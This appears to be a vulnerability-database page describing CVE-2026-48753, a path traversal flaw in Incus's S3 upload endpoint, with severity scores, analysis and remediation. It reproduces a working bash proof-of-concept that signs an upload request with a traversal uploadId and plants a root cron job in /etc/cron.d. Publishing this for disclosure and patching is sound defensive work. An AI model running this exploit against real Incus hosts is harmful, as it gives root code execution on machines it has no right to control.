Skip to main content

Incus CVE-2026-48753

CRITICAL
External Control of File Name or Path (CWE-73)
2026-06-26 https://github.com/lxc/incus GHSA-ccjc-4qc3-jxqc
9.9
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
9.9 CRITICAL
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
vuln.today AI
9.9 CRITICAL

Network-reachable S3 API with low complexity but mandatory bucket credentials (PR:L); host file write escapes the storage sandbox (S:C) and enables root RCE, giving full C/I/A:H.

3.1 AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

3
Source Code Evidence Fetched
Jun 26, 2026 - 19:22 vuln.today
Analysis Generated
Jun 26, 2026 - 19:22 vuln.today
CVE Published
Jun 26, 2026 - 18:47 github-advisory
CRITICAL 9.9

DescriptionGitHub Advisory

Summary

The S3 protocol upload endpoint is vulnerable to path traversal and allows creation of arbitrary files on the host. This behavior could lead to arbitrary command execution.

In internal/server/storage/s3/local/multipart.go, user-controlled upload ID is appended to the uploads directory unsanitized; https://github.com/lxc/incus/blob/40dd4f151d52c06b178482aa2518abfb9df3e6fb/internal/server/storage/s3/local/multipart.go#L33

PoC

Setup

# Expose the S3 API and create a bucket
incus config set core.storage_buckets_address=:8555
incus storage volume create default bucket
#> note the credentials

Exploitation

The below script was mostly generated.

#!/usr/bin/env bash
set -euo pipefail

if [ $
# -lt 4 ]; then
	printf 'usage: $0 endpoint bucket access-key secret-key\n' >&2
	exit 1
fi

endpoint="${1%/}"
bucket="${2}"
access="${3}"
secret="${4}"

region="us-east-1"
service="s3"
key="anything"
part="1"
upload_id="../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/cron.d"
target="/etc/cron.d/part-00001"
cmd="id > /incus-s3-uploadid-bash-rce; rm -f $target"
body="* * * * * root /bin/sh -c '$cmd'
"

uri_path="$(printf '%s' "$endpoint" | sed -E 's#^[a-z]+://[^/]+##')/$bucket/$key"
uri_path="${uri_path#/}"
uri_path="/$uri_path"
host="$(printf '%s' "$endpoint" | sed -E 's#^[a-z]+://([^/]+).*#\1#')"
qs="partNumber=$part&uploadId=${upload_id//\//%2F}"
url="$endpoint/$bucket/$key?$qs"

amz_date=$(date -u +%Y%m%dT%H%M%SZ)
date_scope="${amz_date:0:8}"
scope="$date_scope/$region/$service/aws4_request"
body_hash=$(printf '%s' "$body" | sha256sum | awk '{print $1}')
signed="host;x-amz-content-sha256;x-amz-date"

canonical="PUT
$uri_path
$qs
host:$host
x-amz-content-sha256:$body_hash
x-amz-date:$amz_date

$signed
$body_hash"
canonical_hash="$(printf '%s' "$canonical" | sha256sum | awk '{print $1}')"
string_to_sign="AWS4-HMAC-SHA256
$amz_date
$scope
$canonical_hash"

hmac_hex() {
	printf '%s' "${2}" | openssl dgst -sha256 -mac HMAC -macopt "hexkey:${1}" -binary | xxd -p -c 256
}

k_date=$(printf 'AWS4%s' "$secret" | xxd -p -c 256)
k_date=$(hmac_hex "$k_date" "$date_scope")
k_region=$(hmac_hex "$k_date" "$region")
k_service=$(hmac_hex "$k_region" "$service")
k_signing=$(hmac_hex "$k_service" "aws4_request")
sig=$(hmac_hex "$k_signing" "$string_to_sign")
auth="AWS4-HMAC-SHA256 Credential=${access}/${scope},SignedHeaders=${signed},Signature=${sig}"

printf '
# body:\n%s' "${body}"

curl -ksS -X PUT "${url}" \
	-H "Host: ${host}" \
	-H "X-Amz-Date: ${amz_date}" \
	-H "X-Amz-Content-Sha256: ${body_hash}" \
	-H "Authorization: ${auth}" \
	--data-binary "${body}"

Impact

Arbitrary file write on the host. Possibly leading to arbitrary command execution.

AnalysisAI

Arbitrary host file write in Incus before 7.1.0 lets a holder of S3 bucket credentials escape the storage volume via a path-traversal-laden multipart upload ID and plant files anywhere the daemon (typically root) can write, escalating to remote code execution. The flaw lives in the local S3 storage backend's multipart upload handling, where the attacker-supplied uploadId is concatenated onto the uploads directory without sanitization. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Obtain valid S3 bucket credentials
Delivery
Craft SigV4-signed multipart PUT with traversal uploadId
Exploit
Bypass uploads-directory containment via '../'
Execution
Write part body to /etc/cron.d on host
Persist
Root cron executes payload
Impact
Host compromise / RCE

Vulnerability AssessmentAI

Exploitation Requires three concrete preconditions taken from the description and PoC: (1) the Incus S3 API must be explicitly enabled via core.storage_buckets_address (off by default), (2) at least one storage bucket must exist, and (3) the attacker must hold valid bucket access-key/secret-key credentials to produce a SigV4-signed request (PR:L - authenticated). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 3.1 vector (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H, base 9.9) reflects a low-complexity, network-reachable attack that nonetheless requires some privilege (PR:L) - specifically valid S3 bucket credentials - and produces a scope change (writing host files outside the storage sandbox). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker who has been issued (or has stolen) S3 access/secret keys for any Incus bucket sends a signed PUT multipart-upload request whose uploadId is a long '../../../etc/cron.d' traversal string, causing the uploaded part body to be written as /etc/cron.d/part-00001. The cron file runs an attacker command as root on the next schedule tick, yielding host compromise. …
Remediation Upgrade to Incus 7.1.0 or later, which contains the fix - Vendor-released patch: 7.1.0 (see advisory GHSA-ccjc-4qc3-jxqc at https://github.com/lxc/incus/security/advisories/GHSA-ccjc-4qc3-jxqc). … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Inventory all Incus deployments with S3 storage backend on versions before 7.1.0; disable S3 storage or isolate systems from untrusted networks; audit S3 credential usage in access logs. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2026-45087 CRITICAL POC
10.0 May 12

Unauthenticated remote code execution in Dalfox REST API server mode (versions ≤2.12.0) allows network attackers to exec

CVE-2025-15467 HIGH POC
8.8 Jan 27

OpenSSL has a critical out-of-bounds write when parsing CMS AuthEnvelopedData/EnvelopedData with malicious AEAD paramete

CVE-2025-2263 CRITICAL POC
9.8 Mar 13

During login to the web server in "Sante PACS Server.exe", OpenSSL function EVP_DecryptUpdate is called to decrypt the u

CVE-2026-1357 CRITICAL POC
9.8 Feb 11

Unauthenticated arbitrary file upload in WPvivid Backup & Migration WordPress plugin. EPSS 0.44%.

CVE-2025-34192 CRITICAL POC
9.3 Sep 19

Vasion Print (formerly PrinterLogic) Virtual Appliance Host versions prior to 22.0.893 and Application versions prior to

CVE-2025-34203 CRITICAL POC
9.3 Sep 19

Vasion Print (formerly PrinterLogic) Virtual Appliance Host versions prior to 22.0.1002 and Application versions prior t

CVE-2026-2673 MEDIUM POC
6.5 Mar 13

OpenSSL and Microsoft products using the 'DEFAULT' keyword in TLS 1.3 key exchange group configurations may negotiate we

CVE-2026-25892 HIGH POC
7.5 Feb 09

Adminer versions 5.4.1 and earlier suffer from a post-message validation bypass that allows remote attackers to trigger

CVE-2026-55166 CRITICAL POC
9.9 Jun 25

Privilege escalation to AWS IAM and PKI compromise in Netflix Lemur 1.9.0 (and earlier) lets any SSO-authenticated, low-

CVE-2026-32253 CRITICAL
9.8 May 22

Authentication bypass in LizardByte Sunshine self-hosted game stream host (versions prior to 2026.516.143833) allows rem

CVE-2026-31789 CRITICAL
9.8 Apr 07

Issue summary: Converting an excessively large OCTET STRING value to a hexadecimal string leads to a heap buffer overflo

CVE-2026-8507 CRITICAL
9.8 May 17

Heap out-of-bounds write in the Crypt::OpenSSL::PKCS12 Perl module (versions up to and including 1.94) allows attackers

Share

CVE-2026-48753 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy